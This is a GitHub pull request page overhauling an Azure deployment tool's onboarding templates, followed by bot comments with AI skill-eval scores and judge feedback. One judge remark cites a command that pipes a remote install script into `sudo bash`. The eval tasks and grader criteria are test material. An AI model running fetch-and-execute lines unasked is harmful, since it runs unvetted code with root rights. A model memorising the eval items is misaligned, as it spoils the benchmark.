Skip to content

feat(onboarding): template-driven scaffold + register prompts/eval in matrix#142

Merged
arnaudlh merged 17 commits into
mainfrom
feat/onboarding-overhaul
Jun 8, 2026
Merged

feat(onboarding): template-driven scaffold + register prompts/eval in matrix#142
arnaudlh merged 17 commits into
mainfrom
feat/onboarding-overhaul

Conversation

@arnaudlh
Copy link
Copy Markdown
Member

Summary

End-to-end overhaul of the /git-ape-onboarding flow plus the supporting packaging, instructions, eval registration, and regenerated docs. Five themed commits, each independently revertable:

# Commit Why
1 chore(models): rename gpt-5-codex to gpt-5.3-codex waza catalog renamed; aligns manifest tiers + bench prompt defaults
2 feat(onboarding): replace exampleyml stubs with template-driven scaffold Move workflow scaffolds out of .github/workflows/ (where the .exampleyml hack lived) into .github/skills/git-ape-onboarding/templates/; ship sync scripts; add eval suite + CI parity check; register the eval in the pilot tier
3 feat(extension): register prompt files in VSIX and tighten .vscodeignore plugin.json now declares prompts:; package.template.json registers all 9 prompts as chatPromptFiles; .vscodeignore sheds dev-only .github subtrees from the published VSIX
4 docs(instructions): switch deploy/destroy guidance to Azure Deployment Stacks Copilot-instructions caught up with the actual templates: az stack sub create/delete --action-on-unmanage deleteAll instead of az deployment sub + az group delete (see #30)
5 docs(website): regenerate for templated workflows and prompt assets Generator now scans both .github/workflows/ and the skill templates directory, tags scaffolded workflows with a Docusaurus admonition

Key change: .exampleyml is gone

Old shape (this repo's .github/workflows/):

git-ape-plan.exampleyml
git-ape-deploy.exampleyml
git-ape-destroy.exampleyml
git-ape-verify.exampleyml

.exampleyml was a workaround so GitHub Actions wouldn't auto-load the scaffolds.

New shape (.github/skills/git-ape-onboarding/templates/workflows/):

git-ape-plan.yml
git-ape-deploy.yml
git-ape-destroy.yml
git-ape-verify.yml
git-ape-drift.md          # agentic workflow source
git-ape-drift.lock.yml    # compiled lockfile

The path is no longer .github/workflows/ so the workaround isn't needed. /git-ape-onboarding copies these into the target repo with skip-on-collision so customized workflows are never overwritten.

Eval registration

Adds git-ape-onboarding to pilot tier in .github/evals/manifest.yaml — matches its prior 4-model bench coverage. The eval ships 4 tasks: positive-first-time-setup, positive-multi-env, positive-skip-on-collision, negative-storage-comparison. Closes part of #93.

Verification done

  • actionlint clean on the new git-ape-onboarding-template-check.yml
  • node scripts/generate-docs.js re-runs with no further drift
  • Eval YAML files parse
  • All shell scripts under scripts/ carry the executable bit

Dependency

Depends on #140 (LLM-as-judge → claude-opus-4.7). This PR is mergeable independently — if it lands first, the new git-ape-onboarding eval will run with whatever judge is pinned at merge time, then automatically pick up the opus judge once #140 merges. Prefer to merge #140 first to avoid a mixed-judge snapshot.

Risk

Medium-low.

  • Workflow templates are new files in a non-loaded path, no production CI impact.
  • The 4 .exampleyml deletions are the only destructive change in this repo; their content is preserved verbatim in the templates directory.
  • Eval registration adds 4 new task runs to the next waza-evals matrix dispatch (pilot × 4 models = 16 legs). Quota cost: ~equivalent to prereq-check baseline.


Note: Recreated as a same-repo PR (was originally #141 from arnaudlh/git-ape). Fork PRs cannot read the COPILOT_GITHUB_TOKEN secret, so the waza eval matrix was skipping. Identical commits (8d5b9cf5..e66e2ecc), now wired so evals actually run. Closes #141.

arnaudlh added 6 commits May 29, 2026 16:22
The waza model catalog now ships gpt-5-codex under its versioned ID
gpt-5.3-codex. Align manifest tiers and bench-prompt argument hints
so dispatched runs resolve to a valid model.

- .github/evals/manifest.yaml: pilot + expanded tier model lists
- .github/prompts/agent-bench.prompt.md: default models in argument-hint + body
- .github/prompts/skill-bench.prompt.md: default models in argument-hint + body

🔖 - Generated by Copilot
Rewrite git-ape-onboarding as a skill-driven CLI playbook backed by a
sync-able template bundle. The previous .exampleyml workflows lived in
this repo's .github/workflows/ and were copy-pasted by users; they're
now first-class templates under the skill and pushed into target repos
by scripts/sync-templates.{sh,ps1}.

What ships:
- .github/agents/git-ape-onboarding.agent.md: rewritten flow + tools
- .github/skills/git-ape-onboarding/SKILL.md: new playbook structure
- .github/skills/git-ape-onboarding/scripts/: bash + pwsh helpers
    - scaffold-repo.{sh,ps1}: bootstrap target repo
    - sync-templates.{sh,ps1}: drop-in workflow + instructions update
- .github/skills/git-ape-onboarding/templates/: canonical target-repo
  artifacts (copilot-instructions.md, workflows/git-ape-{plan,deploy,
  destroy,verify,drift}.yml + drift agentic workflow + drift lockfile)
- .github/evals/git-ape-onboarding/: positive + negative tasks for
  first-time-setup, multi-env, skip-on-collision, and storage refusal
- .github/workflows/git-ape-onboarding-template-check.yml: CI check
  that the shipped templates pass actionlint and round-trip cleanly
- .github/evals/manifest.yaml: register git-ape-onboarding in pilot
  tier (matches its prior 4-model bench coverage)

Removed:
- .github/workflows/git-ape-{deploy,destroy,plan,verify}.exampleyml:
  retired — their content is now in skills/.../templates/workflows/

The .exampleyml extension was a workaround to keep GitHub Actions from
auto-loading workflow scaffolds; templates under the skill don't need
the workaround because their path isn't .github/workflows/.

🐵 - Generated by Copilot
Wire the .github/prompts/ directory into the published artifacts:

- plugin.json: declare 'prompts: .github/prompts/' so the plugin
  manifest exposes them alongside agents and skills.
- extension/package.template.json: register all 9 prompt files
  (git-ape, agent-{bench,improve,onboard,promote}, skill-{bench,
  improve,onboard,promote}) under chatPromptFiles so VS Code picks
  them up from the installed extension.
- extension/.vscodeignore: explicitly exclude dev-only .github
  subtrees (actionlint, dependabot, aw, copilot, evals, plugins,
  references, scripts, templates, workflows). Keeps agents/, skills/,
  plugin/, copilot-instructions.md, and now prompts/ in the VSIX
  while shedding ~MB of CI tooling that shouldn't ship to users.

🧩 - Generated by Copilot
…t Stacks

Align copilot-instructions with the actual workflow templates shipped
by the onboarding skill: use 'az stack sub' instead of 'az deployment
sub' / 'az group delete' for the full plan-deploy-destroy lifecycle.

Why this matters for agents reading the instructions:
- The stack is the single unit of lifecycle — create, update, and
  destroy all operate on it, not on the underlying RGs.
- 'deleteAll' on unmanage cleans up every managed resource across
  every scope (subscription, multiple RGs, sub-scope role/policy
  assignments) in one call. No orphans, idempotent re-runs.
- See #30 for the design rationale.

Sample workflow snippet now also passes --action-on-unmanage deleteAll,
--deny-settings-mode none, --yes — matching what
.github/skills/git-ape-onboarding/templates/workflows/git-ape-deploy.yml
generates in target repos.

📘 - Generated by Copilot
scripts/generate-docs.js: teach the workflow doc generator about two
source directories, the existing CI workflows under .github/workflows/
and the new user-facing templates under .github/skills/git-ape-
onboarding/templates/workflows/. Templated workflows get a Docusaurus
:::info admonition explaining they're scaffolded by /git-ape-onboarding
and don't run in the git-ape repo itself. Drops .exampleyml handling
since those stubs are gone.

README.md: update the Workflows table + repo tree to reflect the new
layout. The four git-ape-{plan,deploy,destroy,verify}.exampleyml stubs
no longer exist in .github/workflows/; their canonical sources are
inside the onboarding skill's templates/ directory and scaffolded into
user repos as ready-to-run .yml files. Mention skip-on-collision so
readers know existing workflows are never overwritten.

website/docs/: regenerate every page that the generator touches:
- workflows/{git-ape-plan,deploy,destroy,verify}.md: relocated to the
  template source path + new admonition
- workflows/git-ape-drift-lock.md, git-ape-onboarding-template-check.md
  (new pages)
- workflows/overview.md: refreshed listing
- agents/git-ape-onboarding.md, skills/git-ape-onboarding.md,
  getting-started/onboarding.md: re-synced from current sources
- reference/{plugin-json,marketplace}.md: re-synced to pick up prompts:
  registration and chatPromptFiles entries

📚 - Generated by Copilot
…source

The auto-generated 'Continuous Drift Remediation' page documents the
compiled '.lock.yml' shape. This adds the missing hand-curated page
documenting the agentic '.md' source — schedule, severity model,
anti-flapping rules, safe-outputs configuration, and how to recompile
after editing.

Ported from the private repo with two small adaptations:
- Workflow-file path updated to the template location under
  .github/skills/git-ape-onboarding/templates/workflows/git-ape-drift.md
  (matches the autogen lock-page convention).
- Added the ':::info[Scaffolded by /git-ape-onboarding]' admonition for
  consistency with the autogen lock page; clarifies the file is shipped
  as a template, not run in the git-ape repo itself.
- Added a Related section linking to the lock-page, the
  azure-drift-detector skill, the deployment guide, and the use-case
  overview so readers can navigate the full drift story.

Marked HAND-CURATED at the top so generate-docs.js maintainers know
not to add a generator branch for '.md' workflow sources.

🌊 - Generated by Copilot
@github-actions
Copy link
Copy Markdown
Contributor

github-actions Bot commented May 29, 2026

🤖 Waza agent evals (advisory)

ℹ️ No agents evaluated. changed agent(s) have no eval directory: azure-resource-deployer git-ape git-ape-onboarding

Ran 0 agent evals against claude-sonnet-4.6. Each eval consumes ~5 premium Copilot requests; results are non-blocking — investigate failures via the workflow logs and the per-agent waza-agent-results-* artifacts.

How this works: This workflow auto-syncs the canonical .github/agents/<name>.agent.md into the sibling mirror inside .github/evals/agents/<name>/ before each run, so the score below reflects the version of the agent in this PR — not whatever was committed when the eval was first wired up.

📊 Agent file token comparison vs main (advisory)

No .agent.md files changed vs main (or token-compare returned no entries).

No agents in scope for this PR.

@github-actions
Copy link
Copy Markdown
Contributor

github-actions Bot commented May 29, 2026

🧪 Waza skill evals (advisory)

🔁 Full matrix run. project-wide config change (.waza.yaml, manifest, or workflow file) → full matrix

Ran 12 matrix legs in parallel (skills × models). Results are non-blocking — investigate failures via the workflow logs and the per-leg waza-results-* artifacts.

Legend: Models flagged baseline: true in .github/evals/manifest.yaml (currently: gpt-5.4) run with --baseline (A/B mode) to cap quota. All other models run standard. Judge model is fixed at claude-opus-4.7 across all legs.

📊 Token comparison vs main (advisory)
{
  "baseRef": "main",
  "headRef": "WORKING",
  "threshold": 10,
  "passed": true,
  "timestamp": "2026-06-08T09:00:45.013429047Z",
  "summary": {
    "totalBefore": 0,
    "totalAfter": 38247,
    "totalDiff": 38247,
    "percentChange": 100,
    "filesAdded": 15,
    "filesRemoved": 0,
    "filesModified": 0,
    "filesIncreased": 15,
    "filesDecreased": 0
  },
  "files": [
    {
      "file": ".github/skills/azure-cost-estimator/SKILL.md",
      "before": null,
      "after": {
        "tokens": 3227,
        "characters": 11926,
        "lines": 344
      },
      "diff": 3227,
      "percentChange": 100,
      "status": "added",
      "limit": 500,
      "overLimit": true
    },
    {
      "file": ".github/skills/azure-deployment-preflight/SKILL.md",
      "before": null,
      "after": {
        "tokens": 1444,
        "characters": 6267,
        "lines": 211
      },
      "diff": 1444,
      "percentChange": 100,
      "status": "added",
      "limit": 500,
      "overLimit": true
    },
    {
      "file": ".github/skills/azure-drift-detector/SKILL.md",
      "before": null,
      "after": {
        "tokens": 3179,
        "characters": 13149,
        "lines": 460
      },
      "diff": 3179,
      "percentChange": 100,
      "status": "added",
      "limit": 500,
      "overLimit": true
    },
    {
      "file": ".github/skills/azure-integration-tester/SKILL.md",
      "before": null,
      "after": {
        "tokens": 1559,
        "characters": 6793,
        "lines": 247
      },
      "diff": 1559,
      "percentChange": 100,
      "status": "added",
      "limit": 500,
      "overLimit": true
    },
    {
      "file": ".github/skills/azure-naming-research/SKILL.md",
      "before": null,
      "after": {
        "tokens": 486,
        "characters": 2108,
        "lines": 44
      },
      "diff": 486,
      "percentChange": 100,
      "status": "added",
      "limit": 500
    },
    {
      "file": ".github/skills/azure-policy-advisor/SKILL.md",
      "before": null,
      "after": {
        "tokens": 6233,
        "characters": 26754,
        "lines": 642
      },
      "diff": 6233,
      "percentChange": 100,
      "status": "added",
      "limit": 500,
      "overLimit": true
    },
    {
      "file": ".github/skills/azure-resource-availability/SKILL.md",
      "before": null,
      "after": {
        "tokens": 2409,
        "characters": 9867,
        "lines": 307
      },
      "diff": 2409,
      "percentChange": 100,
      "status": "added",
      "limit": 500,
      "overLimit": true
    },
    {
      "file": ".github/skills/azure-resource-visualizer/SKILL.md",
      "before": null,
      "after": {
        "tokens": 1490,
        "characters": 6165,
        "lines": 191
      },
      "diff": 1490,
      "percentChange": 100,
      "status": "added",
      "limit": 500,
      "overLimit": true
    },
    {
      "file": ".github/skills/azure-rest-api-reference/SKILL.md",
      "before": null,
      "after": {
        "tokens": 1827,
        "characters": 8416,
        "lines": 199
      },
      "diff": 1827,
      "percentChange": 100,
      "status": "added",
      "limit": 500,
      "overLimit": true
    },
    {
      "file": ".github/skills/azure-role-selector/SKILL.md",
      "before": null,
      "after": {
        "tokens": 1276,
        "characters": 5627,
        "lines": 161
      },
      "diff": 1276,
      "percentChange": 100,
      "status": "added",
      "limit": 500,
      "overLimit": true
    },
    {
      "file": ".github/skills/azure-security-analyzer/SKILL.md",
      "before": null,
      "after": {
        "tokens": 5322,
        "characters": 21405,
        "lines": 450
      },
      "diff": 5322,
      "percentChange": 100,
      "status": "added",
      "limit": 500,
      "overLimit": true
    },
    {
      "file": ".github/skills/azure-stack-deploy/SKILL.md",
      "before": null,
      "after": {
        "tokens": 1912,
        "characters": 7525,
        "lines": 159
      },
      "diff": 1912,
      "percentChange": 100,
      "status": "added",
      "limit": 500,
      "overLimit": true
    },
    {
      "file": ".github/skills/azure-stack-destroy/SKILL.md",
      "before": null,
      "after": {
        "tokens": 2644,
        "characters": 10670,
        "lines": 180
      },
      "diff": 2644,
      "percentChange": 100,
      "status": "added",
      "limit": 500,
      "overLimit": true
    },
    {
      "file": ".github/skills/git-ape-onboarding/SKILL.md",
      "before": null,
      "after": {
        "tokens": 3101,
        "characters": 12788,
        "lines": 272
      },
      "diff": 3101,
      "percentChange": 100,
      "status": "added",
      "limit": 500,
      "overLimit": true
    },
    {
      "file": ".github/skills/prereq-check/SKILL.md",
      "before": null,
      "after": {
        "tokens": 2138,
        "characters": 8019,
        "lines": 147
      },
      "diff": 2138,
      "percentChange": 100,
      "status": "added",
      "limit": 500,
      "overLimit": true
    }
  ]
}

Skill: prereq-check

📈 Score (per model) + Suggestions/Recommendations
Model: claude-opus-4.6

Running benchmark: prereq-check-eval
Skill: prereq-check
Engine: copilot-sdk
Model: claude-opus-4.6
Judge Model: claude-opus-4.7
Parallel: 4 workers

✓ [2/4] Negative — Azure service concept question
✓ [1/4] Negative — Editing an ARM template
✓ [3/4] Positive — "command not found" failure
✓ [4/4] Positive — "What do I need to install?"

🧪 Waza Eval Results

Status: ✅ Passed | Score: 0.79 | Duration: 2m0.341s

  • Tests: 4 total, 4 passed, 0 failed, 0 errors
  • Success Rate: 100.0%
  • Score Range: 0.57 - 1.00 (σ=0.2074)

Task Results

Task Score Status Graders
Negative — Editing an ARM template 0.57 budget, trigger_relevance_negative
Negative — Azure service concept question 0.60 budget, trigger_relevance_negative
Positive — "command not found" failure 1.00 answer_quality, budget, trigger_relevance_positive
Positive — "What do I need to install?" 1.00 answer_quality, budget, trigger_relevance_positive

Benchmark: prereq-check-eval | Skill: prereq-check | Model: claude-opus-4.6

Results saved to: .waza-results/prereq-check-claude-opus-4.6.json
JUnit XML saved to: .waza-results/prereq-check-claude-opus-4.6.junit.xml

Model: claude-sonnet-4.6

Running benchmark: prereq-check-eval
Skill: prereq-check
Engine: copilot-sdk
Model: claude-sonnet-4.6
Judge Model: claude-opus-4.7
Parallel: 4 workers

✓ [1/4] Negative — Editing an ARM template
✓ [2/4] Negative — Azure service concept question
✓ [4/4] Positive — "What do I need to install?"
[ERROR] session error: Execution failed: CAPIError: 422 422 422 Unprocessable Entity
(Request ID: 604A:1AA583:402BCC:435B2F:6A268531)

✗ [3/4] Positive — "command not found" failure

🧪 Waza Eval Results

Status: ❌ Failed | Score: 0.77 | Duration: 3m37.483s

  • Tests: 4 total, 3 passed, 1 failed, 0 errors
  • Success Rate: 75.0%
  • Score Range: 0.57 - 1.00 (σ=0.1839)

Task Results

Task Score Status Graders
Negative — Editing an ARM template 0.57 budget, trigger_relevance_negative
Negative — Azure service concept question 0.60 budget, trigger_relevance_negative
Positive — "command not found" failure 0.89 answer_quality, budget, trigger_relevance_positive
Positive — "What do I need to install?" 1.00 answer_quality, budget, trigger_relevance_positive

⚠️ Flaky Tasks

The following tasks showed inconsistent results across runs:

  • Positive — "command not found" failure: 67% pass rate, score=0.89±0.16

Failed Task Details

Positive — "command not found" failure

Run 2/3 (error):

  • answer_quality (0.00): fail: Assistant did not deliver any user-facing response: The assistant's previous response only invoked the prereq-check skill and attempted tool calls that failed with "unexpected user permission response". No user-facing message was produced. Missing all four PASS criteria: (1) did not name az/gh/jq/git, (2) did not provide install commands, (3) did not recommend version verification, (4) did not give a verdict or next steps.
  • budget (1.00): All behavior checks passed
  • trigger_relevance_positive (1.00): Prompt is trigger-aligned (score 1.00 >= 0.50)

Benchmark: prereq-check-eval | Skill: prereq-check | Model: claude-sonnet-4.6

Results saved to: .waza-results/prereq-check-claude-sonnet-4.6.json

Model: gpt-5.3-codex

Running benchmark: prereq-check-eval
Skill: prereq-check
Engine: copilot-sdk
Model: gpt-5.3-codex
Judge Model: claude-opus-4.7
Parallel: 4 workers

[ERROR] session error: You've hit your rate limit. Please wait for your limit to reset in under a minute or switch to auto model to continue. Learn More (https://docs.github.com/copilot/concepts/rate-limits). (Request ID: E82A:1F8B1A:3D7FE0:408A35:6A2684DF)

[ERROR] session error: You've hit your rate limit. Please wait for your limit to reset in under a minute or switch to auto model to continue. Learn More (https://docs.github.com/copilot/concepts/rate-limits). (Request ID: E82A:1F8B1A:3D7F60:4089A4:6A2684DE)

✓ [1/4] Negative — Editing an ARM template
✗ [2/4] Negative — Azure service concept question
✗ [4/4] Positive — "What do I need to install?"
✗ [3/4] Positive — "command not found" failure

🧪 Waza Eval Results

Status: ❌ Failed | Score: 0.74 | Duration: 2m43.554s

  • Tests: 4 total, 1 passed, 3 failed, 0 errors
  • Success Rate: 25.0%
  • Score Range: 0.57 - 0.89 (σ=0.1519)

Task Results

Task Score Status Graders
Negative — Editing an ARM template 0.57 budget, trigger_relevance_negative
Negative — Azure service concept question 0.60 budget, trigger_relevance_negative
Positive — "command not found" failure 0.89 answer_quality, budget, trigger_relevance_positive
Positive — "What do I need to install?" 0.89 answer_quality, budget, trigger_relevance_positive

⚠️ Flaky Tasks

The following tasks showed inconsistent results across runs:

  • Negative — Azure service concept question: 67% pass rate, score=0.60±0.00
  • Positive — "command not found" failure: 67% pass rate, score=0.89±0.16
  • Positive — "What do I need to install?": 67% pass rate, score=0.89±0.16

Failed Task Details

Negative — Azure service concept question

Run 1/3 (error):

  • budget (1.00): All behavior checks passed
  • trigger_relevance_negative (0.20): Prompt correctly treated as non-trigger (score 0.20 < 0.50)

Positive — "command not found" failure

Run 3/3 (failed):

  • answer_quality (0.00): fail: Missing concrete install command for az: Criterion 2 not met: the response does not provide a concrete install command for az on any platform. It only vaguely says "On Linux, install from your distro/package source (or official vendor repos) for azure-cli, gh, jq, and git" without giving an actual command like brew install azure-cli, sudo apt-get install azure-cli, curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash, or winget install Microsoft.AzureCLI. Criteria 1, 3, and 4 are met (all four tools named with versions; verification commands az version, gh --version, etc. provided; verdict ⚠️ REPORTED MISSING with az login/gh auth login next steps).
  • budget (1.00): All behavior checks passed
  • trigger_relevance_positive (1.00): Prompt is trigger-aligned (score 1.00 >= 0.50)

Positive — "What do I need to install?"

Run 1/3 (error):

  • answer_quality (0.00): fail: No prior assistant response exists to grade: There is no previous assistant response in this session to evaluate. The user's question about Git-Ape onboarding prerequisites was never answered, so none of the four PASS criteria (required tools list, auth requirements, version guidance, install commands/verification) can be met.
  • budget (1.00): All behavior checks passed
  • trigger_relevance_positive (1.00): Prompt is trigger-aligned (score 1.00 >= 0.50)

Benchmark: prereq-check-eval | Skill: prereq-check | Model: gpt-5.3-codex

Results saved to: .waza-results/prereq-check-gpt-5.3-codex.json

Model: gpt-5.4 *(baseline — A/B mode)*

Running benchmark: prereq-check-eval
Skill: prereq-check
Engine: copilot-sdk
Model: gpt-5.4
Judge Model: claude-opus-4.7
Parallel: 4 workers

════════════════════════════════════════════════════════════════
PASS 1: Skills-Enabled Run
════════════════════════════════════════════════════════════════
✓ [2/4] Negative — Azure service concept question
✓ [1/4] Negative — Editing an ARM template
✗ [4/4] Positive — "What do I need to install?"
✓ [3/4] Positive — "command not found" failure

════════════════════════════════════════════════════════════════
PASS 2: Skills Baseline (skills stripped)
════════════════════════════════════════════════════════════════
✓ [1/4] Negative — Editing an ARM template
✓ [2/4] Negative — Azure service concept question
✗ [3/4] Positive — "command not found" failure
✓ [4/4] Positive — "What do I need to install?"

════════════════════════════════════════════════════════════════
SKILL IMPACT ANALYSIS
════════════════════════════════════════════════════════════════
Overall Performance Delta:
With Skills: 75.0% (3/4 tasks passed)
Without Skills: 75.0% (3/4 tasks passed)
Impact: no change

Per-Task Breakdown:
• Negative — Editing an ARM template [NEUTRAL] 100% → 100% (+0pp)
• Negative — Azure service concept question [NEUTRAL] 100% → 100% (+0pp)
• Positive — "command not found" failure [IMPROVED] 67% → 100% (+33pp)
• Positive — "What do I need to install?" [REGRESSED] 100% → 67% (-33pp)

Verdict: Skills have NEUTRAL IMPACT (no net change)
════════════════════════════════════════════════════════════════

🧪 Waza Eval Results

Status: ❌ Failed | Score: 0.77 | Duration: 2m5.322s

  • Tests: 4 total, 3 passed, 1 failed, 0 errors
  • Success Rate: 75.0%
  • Score Range: 0.57 - 1.00 (σ=0.1839)

Task Results

Task Score Status Graders
Negative — Editing an ARM template 0.57 budget, trigger_relevance_negative
Negative — Azure service concept question 0.60 budget, trigger_relevance_negative
Positive — "command not found" failure 1.00 answer_quality, budget, trigger_relevance_positive
Positive — "What do I need to install?" 0.89 answer_quality, budget, trigger_relevance_positive

⚠️ Flaky Tasks

The following tasks showed inconsistent results across runs:

  • Positive — "What do I need to install?": 67% pass rate, score=0.89±0.16

Failed Task Details

Positive — "What do I need to install?"

Run 1/3 (failed):

  • answer_quality (0.00): fail: : Criterion 4 not met: the response lists the tools and auth commands and minimum versions, but does not provide install commands (e.g., brew/apt/winget) and does not point the user to a verification script or prereq-check skill invocation. Criteria 1, 2, and 3 are satisfied.
  • budget (1.00): All behavior checks passed
  • trigger_relevance_positive (1.00): Prompt is trigger-aligned (score 1.00 >= 0.50)

Benchmark: prereq-check-eval | Skill: prereq-check | Model: gpt-5.4

Results saved to: .waza-results/prereq-check-gpt-5.4.json

🔢 Tokens (count + profile)

📊 prereq-check: 2,138 tokens (detailed ✓), 10 sections, 2 code blocks
   ⚠️  token count 2138 exceeds 1000

🎯 Quality (5-dim table)

DIMENSION          SCORE  FEEDBACK
────────────────────────────────────────────
clarity            █████  Purpose is immediately obvious, the Quick Reference table is an excellent at-a-glance aid, steps are logically ordered with clear section anchors, and the exact verdict strings (READY / TOOLS MISSING / REPORTED MISSING / AUTH MISSING) eliminate ambiguity in outputs.
completeness       ████░  Error handling covers the most important failure modes well; however, there is no fallback for when the referenced external scripts (check-tools.sh, check-tools.ps1) are absent or not executable — the skill should specify inline commands to run in that case rather than silently depending on files that may not exist.
trigger_precision  ████░  USE FOR is exceptionally detailed with concrete error-message literals, which aids accurate routing; DO NOT USE FOR is too terse ('Anything else') and could be sharpened by explicitly listing one or two adjacent intents to reject (e.g., 'do not use for Azure subscription validation or GitHub repo setup').
scope_coverage     █████  Boundaries are explicitly stated in multiple places (Quick Reference side-effects row, Constraints Always/Never list, Rules), related skills are called out, and the read-only constraint is enforced consistently throughout — scope is tight and well-defended.
anti_patterns      ████░  No conflicting directives or vague instructions; however, the Constraints 'Always' list includes 'Verify with command -v <tool> + <tool> --version after suggested fixes,' which implies the skill re-runs checks post-fix — contradicting the read-only, single-pass design and potentially confusing the agent about whether it should loop.
────────────────────────────────────────────
Overall: 4.4/5.0

A high-quality, production-ready skill document. It is notably strong in clarity and scope definition, with explicit verdict strings, a well-structured Quick Reference, and a thorough Always/Never constraints section. Two actionable improvements: add an inline fallback for missing check scripts, and tighten the DO NOT USE FOR trigger to list at least one concrete adjacent intent to reject.
✅ Check (compliance summary) (59 lines — click to expand)

ℹ️ waza check expects eval.yaml colocated with SKILL.md. This repo separates them into .github/evals/prereq-check/eval.yaml, so the "Evaluation Suite: Not Found" line below is a false negative — the eval actually ran (see the Score section above).

🔍 Skill Readiness Check
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Skill: prereq-check

📋 Compliance Score: Medium-High
   ⚠️  Good, but could be improved. Missing routing clarity.

   Issues found:
   ❌  SKILL.md is 2138 tokens (hard limit 500)

📐 Spec Compliance: 8/9 checks passed
   ❌  Does not fully meet agentskills.io specification.
   ❌  [spec-allowed-fields] Unknown frontmatter fields: argument-hint, user-invocable
     📎  agentskills.io spec allows: name, description, license, allowed-tools, metadata, compatibility

📎 Links: 4/4 valid
   ✅  All links valid.

📊 Token Budget: 2138 / 500 tokens
   ❌  Exceeds limit by 1638 tokens. Consider reducing content.

🧪 Evaluation Suite: Found
   ✅  eval.yaml detected. Run 'waza run eval.yaml' to test.

📐 Schema Validation: Passed
   ✅  eval.yaml schema valid
   ✅  4 task file(s) validated

💡 Advisory Checks
   ✅  [module-count] Found 1 reference module(s)
   ❌  [complexity] Complexity: comprehensive (2138 tokens, 1 modules)
   ✅  [negative-delta-risk] No negative delta risk patterns detected
   ✅  [procedural-content] Description contains procedural language
   ✅  [over-specificity] No over-specificity patterns detected
   ❌  [cross-model-density] Advisory 16: word count is 122 (>60 may reduce cross-model effectiveness)
   ❌  [body-structure] Advisory 17: body structure quality — no examples section found
   ✅  [progressive-disclosure] Content structure supports progressive disclosure
   ✅  [scope-reduction] Capability scope: 8 signal(s) detected (8 level-2 heading(s), 2 numbered procedure(s))

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
📈 Overall Readiness
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

⚠️  Your skill needs some work before submission.

🎯 Next Steps
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

To improve your skill:

1. Add routing clarity (e.g., **UTILITY SKILL**, INVOKES:, FOR SINGLE OPERATIONS:)
2. Run 'waza dev' for interactive compliance improvement
3. Fix spec violation [spec-allowed-fields]: Unknown frontmatter fields: argument-hint, user-invocable
4. Reduce SKILL.md by 1638 tokens. Run 'waza tokens suggest' for optimization tips

Skill: git-ape-onboarding

📈 Score (per model) + Suggestions/Recommendations
Model: claude-opus-4.6

Running benchmark: git-ape-onboarding-eval
Skill: git-ape-onboarding
Engine: copilot-sdk
Model: claude-opus-4.6
Judge Model: claude-opus-4.7
Parallel: 4 workers

✓ [1/4] Negative — Storage service comparison (off-topic)
[ERROR] session error: You've hit your rate limit. Please wait for your limit to reset in under a minute or switch to auto model to continue. Learn More (https://docs.github.com/copilot/concepts/rate-limits). (Request ID: 4433:3F3797:3C1AB5:3F25DF:6A2684DE)

✗ [4/4] Positive — Scaffold honors skip-with-notice on collision
✗ [3/4] Positive — Multi-environment onboarding
✗ [2/4] Positive — First-time repo setup

🧪 Waza Eval Results

Status: ❌ Failed | Score: 0.60 | Duration: 59.301s

  • Tests: 4 total, 1 passed, 3 failed, 0 errors
  • Success Rate: 25.0%
  • Score Range: 0.56 - 0.65 (σ=0.0340)

Task Results

Task Score Status Graders
Negative — Storage service comparison (off-topic) 0.56 budget, trigger_relevance_negative
Positive — First-time repo setup 0.60 answer_quality, budget, trigger_relevance_positive
Positive — Multi-environment onboarding 0.58 answer_quality, budget, trigger_relevance_positive
Positive — Scaffold honors skip-with-notice on collision 0.65 answer_quality, budget, trigger_relevance_positive

Failed Task Details

Positive — First-time repo setup

Run 1/1 (failed):

  • answer_quality (0.00): fail: Missing prereq results and explicit auth-gate surfacing: Criterion 1 NOT met: No prereq check results presented. The agent attempted to run check-tools.sh and several bash probes, but every shell call returned "unexpected user permission response". No tool versions, no status table, no inspection output of any kind was shown — the agent never proved it inspected the environment. Criterion 2 NOT met: The blocking gate the agent surfaced was "I cannot execute shell commands" (sandbox permission), not the expected auth/prereq gate (e.g. "az not authenticated", "az login required", ❌ on Azure auth row). There is no explicit auth status or tool-missing marker. Criterion 3 MET: The agent requested 4 inputs (GitHub repo URL, Azure subscription ID, RBAC role, onboarding mode). Criterion 4 MET: The agent made no false claims of having configured OIDC, federated credentials, RBAC, environments, or scaffolded files; it explicitly waits for inputs and access.
  • budget (1.00): All behavior checks passed
  • trigger_relevance_positive (0.81): Prompt is trigger-aligned (score 0.81 >= 0.50)

Positive — Multi-environment onboarding

Run 1/1 (failed):

  • answer_quality (0.00): fail: Response skipped prereq gating: Criterion 1 missing: No prereq check results / tool & auth status table — the response only listed prerequisites as assumptions ("You have Owner...", "az and gh are authenticated") without actually inspecting the local environment (no az account show, gh auth status, version checks, etc.).

Criterion 2 missing: No auth/prereq gate was surfaced. The agent did not verify whether az/gh were authenticated or block on missing auth; it proceeded straight to walkthrough steps.

Criterion 3 met: The agent requested 3 inputs at the end (org/repo, staging subscription ID, RBAC role).

Criterion 4 met: Multi-environment awareness is shown — explicitly names azure-deploy-staging environment, creates a separate federated credential entry for it, and discusses per-environment secrets/variables scoping subscription IDs.

Fails on criteria 1 and 2 (no prereq inspection, no explicit auth gate).

  • budget (1.00): All behavior checks passed
  • trigger_relevance_positive (0.73): Prompt is trigger-aligned (score 0.73 >= 0.50)

Positive — Scaffold honors skip-with-notice on collision

Run 1/1 (error):

  • answer_quality (0.00): fail: No prior assistant response to grade: There is no previous assistant response in the session to evaluate. None of the four criteria (skip-on-collision, notice surfaced, diff/backup recommendation, opt-in overwrite guidance) can be assessed because no answer was produced.
  • budget (1.00): All behavior checks passed
  • trigger_relevance_positive (0.94): Prompt is trigger-aligned (score 0.94 >= 0.50)

Benchmark: git-ape-onboarding-eval | Skill: git-ape-onboarding | Model: claude-opus-4.6

Results saved to: .waza-results/git-ape-onboarding-claude-opus-4.6.json

Model: claude-sonnet-4.6

Running benchmark: git-ape-onboarding-eval
Skill: git-ape-onboarding
Engine: copilot-sdk
Model: claude-sonnet-4.6
Judge Model: claude-opus-4.7
Parallel: 4 workers

✓ [1/4] Negative — Storage service comparison (off-topic)
